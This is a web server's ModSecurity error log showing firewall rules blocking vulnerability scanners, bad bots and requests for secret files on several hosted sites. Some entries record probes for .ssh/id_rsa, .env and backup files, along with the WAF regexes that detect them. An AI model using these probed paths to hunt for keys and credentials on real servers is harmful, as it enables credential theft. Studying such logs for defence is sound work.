[Tue May 26 14:51:33.147885 2026] [security2:error] [pid 658374:tid 658591] [client 213.35.106.232:49331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-admin/load-styles.php"] [unique_id "ahVmHZ1Mb7_aby-E0KcZ0AAAAFc"]
[Tue May 26 14:51:33.635661 2026] [security2:error] [pid 658374:tid 658534] [client 178.20.45.128:51973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.45.20.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.yourstorybag.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVmHZ1Mb7_aby-E0KcZ3QAAAB4"], referer: http://www.yourstorybag.com/blog/
[Tue May 26 14:51:34.609533 2026] [security2:error] [pid 658374:tid 658610] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmHp1Mb7_aby-E0KcZ7wAAAGo"]
[Tue May 26 14:51:35.447450 2026] [security2:error] [pid 658374:tid 658525] [client 213.35.106.232:49503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/version.php"] [unique_id "ahVmH51Mb7_aby-E0KcaEQAAABU"]
[Tue May 26 14:51:36.193382 2026] [security2:error] [pid 658374:tid 658545] [client 185.96.37.44:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVmIJ1Mb7_aby-E0KcaIwAAACk"]
[Tue May 26 14:51:36.194037 2026] [security2:error] [pid 658374:tid 658588] [client 185.96.37.44:60347] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahVmIJ1Mb7_aby-E0KcaHwAAAFQ"]
[Tue May 26 14:51:36.223228 2026] [security2:error] [pid 658374:tid 658587] [client 213.35.106.232:49914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/functions.php"] [unique_id "ahVmIJ1Mb7_aby-E0KcaJwAAAFM"]
[Tue May 26 14:51:36.898152 2026] [security2:error] [pid 658374:tid 658615] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmIJ1Mb7_aby-E0KcaMwAAAG8"]
[Tue May 26 14:51:37.181930 2026] [security2:error] [pid 658374:tid 658524] [client 213.35.106.232:50035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahVmIZ1Mb7_aby-E0KcaUwAAABQ"]
[Tue May 26 14:51:38.172093 2026] [security2:error] [pid 658374:tid 658538] [client 213.35.106.232:50203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/option.php"] [unique_id "ahVmIp1Mb7_aby-E0KcaiAAAACI"]
[Tue May 26 14:51:39.070780 2026] [security2:error] [pid 658374:tid 658545] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmIp1Mb7_aby-E0KcapQAAACk"]
[Tue May 26 14:51:39.170521 2026] [security2:error] [pid 658374:tid 658537] [client 213.35.106.232:50410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/post.php"] [unique_id "ahVmI51Mb7_aby-E0KcauQAAACE"]
[Tue May 26 14:51:40.116788 2026] [security2:error] [pid 658374:tid 658511] [client 213.35.106.232:50583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-includes/user.php"] [unique_id "ahVmJJ1Mb7_aby-E0KcazQAAAAc"]
[Tue May 26 14:51:41.237225 2026] [security2:error] [pid 658374:tid 658585] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmJJ1Mb7_aby-E0Kca2QAAAFE"]
[Tue May 26 14:51:42.391356 2026] [security2:error] [pid 658374:tid 658577] [client 81.22.193.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmJp1Mb7_aby-E0Kca_QAAAEk"], referer: https://www.anujtradingco.com/
[Tue May 26 14:51:43.433278 2026] [security2:error] [pid 658374:tid 658543] [client 81.22.193.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmJ51Mb7_aby-E0KcbHgAAACc"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1455561&moderation-hash=d8a8db260cabf79fd7e5e9c648a6f0fa
[Tue May 26 14:51:43.618047 2026] [security2:error] [pid 658374:tid 658559] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmJ51Mb7_aby-E0KcbGAAAADc"]
[Tue May 26 14:51:44.360809 2026] [security2:error] [pid 658374:tid 658558] [client 185.96.37.44:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVmJ51Mb7_aby-E0KcbOQAAADY"], referer: http://www.kardashevtechnologies.com/
[Tue May 26 14:51:44.361712 2026] [security2:error] [pid 658374:tid 658584] [client 185.96.37.44:36793] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/"] [unique_id "ahVmJ51Mb7_aby-E0KcbNwAAAFA"], referer: http://www.kardashevtechnologies.com/
[Tue May 26 14:51:45.199957 2026] [security2:error] [pid 658374:tid 658553] [client 85.121.127.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "taotechservices.com"] [uri "/index.php"] [unique_id "ahVmKZ1Mb7_aby-E0KcbcwAAADE"]
[Tue May 26 14:51:45.429887 2026] [security2:error] [pid 658374:tid 658513] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmKZ1Mb7_aby-E0KcbawAAAAk"]
[Tue May 26 14:51:45.951375 2026] [security2:error] [pid 658374:tid 658598] [client 213.35.106.232:50766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahVmKZ1Mb7_aby-E0KcblgAAAF4"]
[Tue May 26 14:51:48.096875 2026] [security2:error] [pid 658374:tid 658508] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmK51Mb7_aby-E0Kcb1gAAAAQ"]
[Tue May 26 14:51:48.334161 2026] [security2:error] [pid 658374:tid 658599] [client 81.22.193.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVmLJ1Mb7_aby-E0Kcb8AAAAF8"], referer: https://anujtradingco.com
[Tue May 26 14:51:49.907458 2026] [security2:error] [pid 658374:tid 658537] [client 173.252.82.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVmLZ1Mb7_aby-E0KccGgAAACE"]
[Tue May 26 14:51:50.295661 2026] [security2:error] [pid 658374:tid 658612] [client 193.203.165.234:56828] ModSecurity: Warning. Matched phrase "Disco" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "buysellcraft.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVmLp1Mb7_aby-E0KccTgAAAGw"]
[Tue May 26 14:51:50.376100 2026] [security2:error] [pid 658374:tid 658511] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmLZ1Mb7_aby-E0KccPgAAAAc"]
[Tue May 26 14:51:52.749614 2026] [security2:error] [pid 658374:tid 658563] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmMJ1Mb7_aby-E0KccmAAAADs"]
[Tue May 26 14:51:54.980047 2026] [security2:error] [pid 658374:tid 658553] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmMp1Mb7_aby-E0KcdOwAAADE"]
[Tue May 26 14:51:56.603861 2026] [security2:error] [pid 658374:tid 658546] [client 85.121.127.3:58918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.127.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVmNJ1Mb7_aby-E0KcdigAAACo"]
[Tue May 26 14:51:57.212072 2026] [security2:error] [pid 658374:tid 658601] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmNJ1Mb7_aby-E0KcdkgAAAGE"]
[Tue May 26 14:51:59.082634 2026] [security2:error] [pid 658374:tid 658602] [client 85.121.127.3:58872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 3.127.121.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVmNp1Mb7_aby-E0Kcd0AAAAGI"], referer: https://taotechservices.com/wp-admin/
[Tue May 26 14:51:59.162567 2026] [security2:error] [pid 658374:tid 658606] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmNp1Mb7_aby-E0KcdzwAAAGY"]
[Tue May 26 14:51:59.371248 2026] [security2:error] [pid 658374:tid 658558] [client 49.34.127.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmNp1Mb7_aby-E0Kcd2wAAADY"]
[Tue May 26 14:52:02.158082 2026] [security2:error] [pid 658374:tid 658543] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmOZ1Mb7_aby-E0KceRQAAACc"]
[Tue May 26 14:52:03.199978 2026] [security2:error] [pid 658374:tid 658560] [client 5.255.99.53:40092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_dsa"] [unique_id "ahVmO51Mb7_aby-E0KceewAAADg"]
[Tue May 26 14:52:03.627020 2026] [security2:error] [pid 658374:tid 658583] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmO51Mb7_aby-E0KceeAAAAE8"]
[Tue May 26 14:52:03.810938 2026] [security2:error] [pid 658374:tid 658624] [client 5.255.99.53:40076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.ssh/id_rsa"] [unique_id "ahVmO51Mb7_aby-E0KcepgAAAHg"]
[Tue May 26 14:52:03.811071 2026] [security2:error] [pid 658374:tid 658576] [client 5.255.99.53:39994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahVmO51Mb7_aby-E0KcepQAAAEg"]
[Tue May 26 14:52:03.858198 2026] [autoindex:error] [pid 658374:tid 658615] [client 164.68.127.128:58461] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 14:52:04.213514 2026] [security2:error] [pid 658374:tid 658546] [client 5.255.99.53:39794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVmPJ1Mb7_aby-E0KcewwAAACo"]
[Tue May 26 14:52:04.680829 2026] [security2:error] [pid 658374:tid 658499] [remote 74.7.241.58:51966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVmPJ1Mb7_aby-E0Kce2wAAV3w"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:52:04.717052 2026] [security2:error] [pid 658374:tid 658541] [client 5.255.99.53:36210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahVmPJ1Mb7_aby-E0Kce3AAAACU"]
[Tue May 26 14:52:04.888911 2026] [security2:error] [pid 658374:tid 658618] [client 5.255.99.53:40122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/.env.backup"] [unique_id "ahVmPJ1Mb7_aby-E0Kce6QAAAHI"]
[Tue May 26 14:52:05.215803 2026] [security2:error] [pid 658374:tid 658515] [client 5.255.99.53:39930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfAAAAAAs"]
[Tue May 26 14:52:05.269384 2026] [security2:error] [pid 658374:tid 658555] [client 5.255.99.53:40092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfCgAAADM"]
[Tue May 26 14:52:05.279319 2026] [security2:error] [pid 658374:tid 658574] [client 5.255.99.53:40076] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfDwAAAEY"]
[Tue May 26 14:52:05.279374 2026] [security2:error] [pid 658374:tid 658530] [client 5.255.99.53:39994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.omshriinfrastructures.com"] [uri "/___proxy_subdomain_webdisk/public/.env"] [unique_id "ahVmPZ1Mb7_aby-E0KcfDgAAABo"]
[Tue May 26 14:52:05.731067 2026] [security2:error] [pid 658374:tid 658504] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmPZ1Mb7_aby-E0KcfDAAAAAA"]
[Tue May 26 14:52:06.851421 2026] [autoindex:error] [pid 658374:tid 658517] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:52:07.985410 2026] [security2:error] [pid 658374:tid 658535] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmP51Mb7_aby-E0KcfngAAAB8"]
[Tue May 26 14:52:10.638470 2026] [security2:error] [pid 658374:tid 658552] [client 37.27.51.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVmQZ1Mb7_aby-E0Kcf-gAAADA"]
[Tue May 26 14:52:10.954265 2026] [security2:error] [pid 658374:tid 658527] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmQp1Mb7_aby-E0KcgBwAAABc"]
[Tue May 26 14:52:12.385976 2026] [security2:error] [pid 658374:tid 658531] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmQ51Mb7_aby-E0KcgLwAAABs"]
[Tue May 26 14:52:13.600012 2026] [security2:error] [pid 658374:tid 658544] [client 114.119.133.194:55943] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/battle-of-bosworth-puritan-shiraz"] [unique_id "ahVmRZ1Mb7_aby-E0KcgTAAAACg"], referer: http://haddingtonwines.com/products/babydoll-pinot-noir
[Tue May 26 14:52:14.944276 2026] [security2:error] [pid 658374:tid 658510] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmRp1Mb7_aby-E0KcgawAAAAY"]
[Tue May 26 14:52:17.366373 2026] [security2:error] [pid 658374:tid 658629] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmSJ1Mb7_aby-E0KcgwwAAAH0"]
[Tue May 26 14:52:19.009045 2026] [autoindex:error] [pid 658374:tid 658529] [client 34.73.215.69:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
